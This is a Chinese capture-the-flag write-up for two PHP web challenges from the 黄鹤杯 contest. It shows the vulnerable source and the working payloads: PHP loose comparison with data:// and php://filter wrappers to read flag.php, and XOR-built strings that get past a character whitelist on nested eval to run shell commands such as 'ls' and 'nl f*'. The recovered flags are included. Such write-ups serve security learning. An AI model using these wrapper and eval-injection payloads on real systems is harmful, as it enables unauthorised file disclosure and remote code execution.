黄鹤杯

web

Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
<?php
highlight_file(__FILE__);
include("aid.php");
if(!(isset($_GET["input1"]) && isset($_GET["input2"]) && isset($_GET["input3"])))
{
    die("Insufficient Inputs!");
}

$input1 = $_GET["input1"];
$input2 = $_GET["input2"];
$input3 = $_GET["input3"];

if($input1==0&&file_get_contents($input2)=="Welcome!"&&$input2==0)
{

    if(stripos("flag.php", $input1) === false)
    {
        echo file_get_contents($input1);
        $variable = unserialize($input3);
        $variable();
    }
}

弱比较传入字符串即可满足==0,file_get_contents($input2)==”Welcome!”利用data伪协议绕过,stripos(“flag.php”, $input1) === false的限制跟没有一样,直接伪协议读取flag.php即可
payload:
http://103.213.97.75:52005/?input1=php://filter/read=convert.base64-encode/resource=flag.php&input2=data://text/plain,Welcome!&input3=0
解码获得flag

RCEME

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
 <?php
error_reporting(0);

if(!isset($_GET["calc"])) 
{
    highlight_file(__FILE__);
}
else
{
    $wl = preg_match('/^[0-9\+\-\*\/\(\)\'\.\~\^\|\&]+$/i', $_GET["calc"]);
    if($wl === 0 || strlen($_GET["calc"]) > 70) {
        die("try again");
    }
    echo 'Result: ';
    eval("echo ".eval("return ".$_GET["calc"].";").";");
}

利用异或凑payload
('0'^'.'^'~').('^^'^'2-').('0'^'.'^'~')

ls
index.php flag.php

('0'^'.'^'~').('02~8'^'^^^^').'*'.('0'^'.'^'~')

nl f*
flag{b0c8f88ef3294ae9b605dd78f608200e}